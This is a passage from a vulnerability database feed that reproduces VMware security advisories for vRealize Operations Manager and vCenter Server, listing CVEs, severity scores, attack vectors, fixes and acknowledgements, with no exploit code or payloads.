\n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below.\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n##### **3b. Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983)**\n\n**Description**\n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21983 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21983 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA FAQ was created which is listed in the 'Additional Documentation' column of the 'Response Matrix' below. \n\n\n**Acknowledgements**\n\nVMware would like to thank Egor Dimitrenko of Positive Technologies for reporting this vulnerability to us. \n\n\n**Notes**\n\n[1] The hotfixes previously mentioned in this advisory were found to only have partially resolved CVE-2021-21975 leaving a residual risk of moderate severity (CVSS = 4.3). Hotfixes created to resolve the vulnerabilities documented in [VMSA-2021-0018](<https://www.vmware.com/security/advisories/VMSA-2021-0018.html>) also include complete fixes for CVE-2021-21975. 
\n \n[2] vRealize Operations Manager 8.4.0 shipped with the aforementioned incomplete fixes, and is therefore partially impacted by CVE-2021-21975.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "VMSA-2021-0004.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.1.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:03", "description": "3a. Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) \n\nThe vRealize Operations Manager API contains a Server Side Request Forgery. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 8.6. \n\n3b. 
Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) \n\nThe vRealize Operations Manager API contains an arbitrary file write vulnerability. VMware has evaluated this issue to be of 'Important' severity with a maximum CVSSv3 base score of 7.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-30T00:00:00", "type": "vmware", "title": "VMware vRealize Operations updates address Server Side Request Forgery and Arbitrary File Write vulnerabilities (CVE-2021-21975, CVE-2021-21983)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-08-24T00:00:00", "id": "VMSA-2021-0004.2", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0004.2.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-09-29T11:05:22", "description": "##### **1\\. Impacted Products**\n\n * VMware vCenter Server (vCenter Server) \n\n * VMware Cloud Foundation (Cloud Foundation) \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in VMware vCenter Server were privately reported to VMware. 
Updates are available to remediate these vulnerabilities in affected VMware products. \n\n\n##### **3a. vCenter Server file upload vulnerability (CVE-2021-22005)**\n\n**Description**\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the [Critical severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [9.8.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22005 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-22005 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\n * **VMware has confirmed reports that CVE-2021-22005 is being exploited in the wild.** \n\n * This issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us. \n\n\n\n\n##### **3b. vCenter Server local privilege escalation vulnerability (CVE-2021-21991)**\n\n**Description**\n\nThe vCenter Server contains a local privilege escalation vulnerability due to the way it handles session tokens. 
VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [8.8](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H>).\n\n**Known Attack Vectors**\n\nA malicious actor with non-administrative user access on vCenter Server host may exploit this issue to escalate privileges to Administrator on the vSphere Client (HTML5) or vCenter Server vSphere Web Client (FLEX/Flash). \n\n\n**Resolution**\n\nTo remediate CVE-2021-21991 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: https://via.vmw.com/vmsa-2021-0020-faq \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Hynek Petrak of Schneider Electric for reporting this issue to us. \n\n\n\n\n##### **3c. vCenter Server reverse proxy bypass vulnerability (CVE-2021-22006)**\n\n**Description**\n\nThe vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [8.3.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22006 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. 
\n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3d. vCenter server unauthenticated API endpoint vulnerability (CVE-2021-22011)**\n\n**Description**\n\nThe vCenter Server contains an unauthenticated API endpoint vulnerability in vCenter Server Content Library. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [8.1](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to perform unauthenticated VM network setting manipulation. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22011 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3e. vCenter Server improper permission local privilege escalation vulnerabilities (CVE-2021-22015)**\n\n**Description**\n\nThe vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. 
VMware has evaluated the severity of these issues to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.8.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22015 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Yuval Lazar (@Ul7raVi0l3t) of Pentera, Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for independently reporting these issues to us.\n\n\n\n##### **3f. vCenter Server unauthenticated API information disclosure vulnerability (CVE-2021-22012)**\n\n**Description**\n\nThe vCenter Server contains an information disclosure vulnerability due to an unauthenticated appliance management API. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22012 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. 
\n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 6.5.\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3g. vCenter Server file path traversal vulnerability (CVE-2021-22013)**\n\n**Description**\n\nThe vCenter Server contains a file path traversal vulnerability leading to information disclosure in the appliance management API. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N>). \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22013 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3h. vCenter Server reflected XSS vulnerability (CVE-2021-22016)**\n\n**Description**\n\nThe vCenter Server contains a reflected cross-site scripting vulnerability due to a lack of input sanitization. 
VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H>). \n\n\n**Known Attack Vectors**\n\nAn attacker may exploit this issue to execute malicious scripts by tricking a victim into clicking a malicious link. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22016 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 6.7.\n\n**Acknowledgements**\n\nVMware would like to thank icez for reporting this issue to us.\n\n\n\n##### **3i. vCenter Server rhttpproxy bypass vulnerability (CVE-2021-22017)**\n\n**Description**\n\nRhttproxy as used in vCenter Server contains a vulnerability due to improper implementation of URI normalization. VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to bypass proxy leading to internal endpoints being accessed. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22017 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. 
\n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 7.0. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3j. vCenter Server authenticated code execution vulnerability (CVE-2021-22014)**\n\n**Description**\n\nThe vCenter Server contains an authenticated code execution vulnerability in VAMI (Virtual Appliance Management Infrastructure). VMware has evaluated the severity of this issue to be in the [Important severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [7.2](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authenticated VAMI user with network access to port 5480 on vCenter Server may exploit this issue to execute code on the underlying operating system that hosts vCenter Server. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22014 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3k. vCenter Server file deletion vulnerability (CVE-2021-22018)** \n\n\n**Description**\n\nThe vCenter Server contains an arbitrary file deletion vulnerability in a VMware vSphere Life-cycle Manager plug-in. 
VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [6.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 9087 on vCenter Server may exploit this issue to delete non critical files.\n\n**Resolution**\n\nTo remediate CVE-2021-22018 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue affects only vCenter Server 7.0.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov of Solidlab working with Trend Micro Zero Day Initiative for reporting this issue to us. \n\n\n\n\n##### **3l. vCenter Server XML parsing denial-of-service vulnerability (CVE-2021-21992)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability due to improper XML entity parsing. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [6.5](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with non-administrative user access to the vCenter Server vSphere Client (HTML5) or vCenter Server vSphere Web Client (FLEX/Flash) may exploit this issue to create a denial-of-service condition on the vCenter Server host. 
\n\n\n**Resolution**\n\nTo remediate CVE-2021-21992 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Osama Alaa of Malcrove for reporting this issue to us.\n\n\n\n##### **3m. vCenter Server local information disclosure vulnerability (CVE-2021-22007)**\n\n**Description**\n\nThe vCenter Server contains a local information disclosure vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.5](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authenticated user with non-administrative privilege may exploit this issue to gain access to sensitive information. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22007 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3n. 
vCenter Server denial of service vulnerability (CVE-2021-22019)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability in VAPI (vCenter API) service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 5480 on vCenter Server may exploit this issue by sending a specially crafted jsonrpc message to create a denial of service condition. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22019 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for reporting these issues to us.\n\n\n\n##### **3o. 
vCenter Server VAPI multiple denial of service vulnerabilities (CVE-2021-22009)**\n\n**Description**\n\nThe vCenter Server contains multiple denial-of-service vulnerabilities in VAPI (vCenter API) service. VMware has evaluated the severity of these issues to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit these issues to create a denial of service condition due to excessive memory consumption by VAPI service. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22009 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for reporting these issues to us.\n\n\n\n##### **3p. vCenter Server VPXD denial of service vulnerability (CVE-2021-22010)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability in VPXD (Virtual Provisioning X Daemon) service. 
VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue to create a denial of service condition due to excessive memory consumption by VPXD service. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22010 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3q. vCenter Server information disclosure vulnerability (CVE-2021-22008)**\n\n**Description**\n\nThe vCenter Server contains an information disclosure vulnerability in VAPI (vCenter API) service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.3](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 on vCenter Server may exploit this issue by sending a specially crafted jsonrpc message to gain access to sensitive information. 
\n\n\n**Resolution**\n\nTo remediate CVE-2021-22008 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone.\n\n**Acknowledgements**\n\nVMware would like to thank Sergey Gerasimov and George webpentest Noseevich of Solidlab working with Trend Micro Zero Day Initiative for reporting this issue to us.\n\n\n\n##### **3r. vCenter Server Analytics service denial-of-service Vulnerability (CVE-2021-22020)**\n\n**Description**\n\nThe vCenter Server contains a denial-of-service vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [5.0](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H>).\n\n**Known Attack Vectors**\n\nSuccessful exploitation of this issue may allow an attacker to create a denial-of-service condition on vCenter Server. \n\n\n**Resolution**\n\nTo remediate CVE-2021-22020 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nThis issue does not affect vCenter Server 6.5. \n\n\n**Acknowledgements**\n\nVMware would like to thank George Noseevich (@webpentest) and Sergey Gerasimov of SolidLab LLC for reporting this issue to us.\n\n\n\n##### **3s. 
vCenter Server SSRF vulnerability (CVE-2021-21993)**\n\n**Description**\n\nThe vCenter Server contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in vCenter Server Content Library. VMware has evaluated the severity of this issue to be in the [Moderate severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [4.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N>)[.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nAn authorised user with access to content library may exploit this issue by sending a POST request to vCenter Server leading to information disclosure. \n\n\n**Resolution**\n\nTo remediate CVE-2021-21993 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nNone. \n\n\n**Additional Documentation**\n\nA supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0020-faq> \n\n\n**Notes**\n\nNone. \n\n\n**Acknowledgements**\n\nVMware would like to thank Osama Alaa of Malcrove and vitquay of Vantage Point Security for independently reporting this issue to us. 
\n\n\n", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22012", "CVE-2021-22013", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22018", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2021-09-21T00:00:00", "id": "VMSA-2021-0020", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0020.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:00", "description": "3a. vCenter Server file upload vulnerability (CVE-2021-22005) \n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. vCenter Server local privilege escalation vulnerability (CVE-2021-21991) \n\nThe vCenter Server contains a local privilege escalation vulnerability due to the way it handles session tokens. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8. \n\n3c. vCenter Server reverse proxy bypass vulnerability (CVE-2021-22006) \n\nThe vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.3. \n\n3d. vCenter server unauthenticated API endpoint vulnerability (CVE-2021-22011) \n\nThe vCenter Server contains an 